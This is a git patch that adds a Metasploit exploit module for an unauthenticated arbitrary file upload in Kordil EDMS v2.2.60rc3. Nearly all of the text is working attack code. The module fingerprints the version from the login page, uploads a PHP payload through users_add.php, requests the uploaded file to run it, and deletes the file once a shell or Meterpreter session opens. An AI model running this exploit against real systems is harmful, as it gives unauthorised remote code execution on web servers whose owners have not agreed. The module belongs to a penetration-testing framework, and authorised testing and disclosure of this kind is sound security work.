From 002654317ce99555dcf6298a543f6a4d94970398 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 22 Feb 2013 23:32:17 +1030
Subject: [PATCH] Add Kordil EDMS File Upload Vulnerability exploit

---
 .../multi/http/kordil-edms-upload-exec.rb     | 137 ++++++++++++++++++
 1 file changed, 137 insertions(+)
 create mode 100644 modules/exploits/multi/http/kordil-edms-upload-exec.rb

diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb
new file mode 100644
index 0000000000..d4caccb78b
--- /dev/null
+++ b/modules/exploits/multi/http/kordil-edms-upload-exec.rb
@@ -0,0 +1,137 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
+			'Description'    => %q{
+				This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.
+				This application has an upload feature that allows an unauthenticated user
+				to upload arbitrary files to the '/kordil_edms/userpictures/' directory.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
+				],
+			'References'     =>
+				[
+					#['OSVDB', ''],
+					#['EDB',   ''],
+				],
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['Automatic Targeting', { 'auto' => true }]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Feb 22 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
+			], self.class)
+	end
+
+	def check
+
+		base  = target_uri.path
+		base << '/' if base[-1, 1] != '/'
+		peer  = "#{rhost}:#{rport}"
+
+		# retrieve software version from login page
+		begin
+			res = send_request_cgi({
+				'method' => 'GET',
+				'uri'    => "#{base}global_group_login.php"
+			})
+			if res and res.code == 200
+				if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/
+					return Exploit::CheckCode::Vulnerable
+				elsif res.body =~ /Kordil EDMS v/
+					return Exploit::CheckCode::Detected
+				end
+			end
+			return Exploit::CheckCode::Safe
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{peer} - Connection failed")
+		end
+		return Exploit::CheckCode::Unknown
+
+	end
+
+	def upload(base, file)
+		data = Rex::MIME::Message.new
+		data.add_part(file,       'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"")
+		data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"')
+		data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"')
+		data.add_part("n", nil, nil, 'form-data; name="act"')
+		data_post = data.to_s
+		data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+		res = send_request_cgi({
+			'method'  => 'POST',
+			'uri'     => "#{base}users_add.php",
+			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+			'data'    => data_post
+		})
+		return res
+	end
+
+	def on_new_session(client)
+		if client.type == "meterpreter"
+			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+			client.fs.file.rm("#{@fname}.php")
+		else
+			client.shell_command_token("rm #{@fname}.php")
+		end
+	end
+
+
+	def exploit
+
+		base   = target_uri.path
+		base  << '/' if base[-1, 1] != '/'
+		@peer  = "#{rhost}:#{rport}"
+		@fname = rand_text_numeric(7)
+
+		# upload PHP payload to userpictures/[fname].php
+		print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
+		php    = %Q|<?php #{payload.encoded} ?>|
+		begin
+			res = upload(base, php)
+			if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
+				print_good("#{@peer} - File uploaded successfully")
+			else
+				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
+			end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+		end
+
+		# retrieve and execute PHP payload
+		print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
+		begin
+			res = send_request_cgi({
+				'method' => 'GET',
+				'uri'    => "#{base}userpictures/#{@fname}.php"
+			})
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
+		end
+
+	end
+end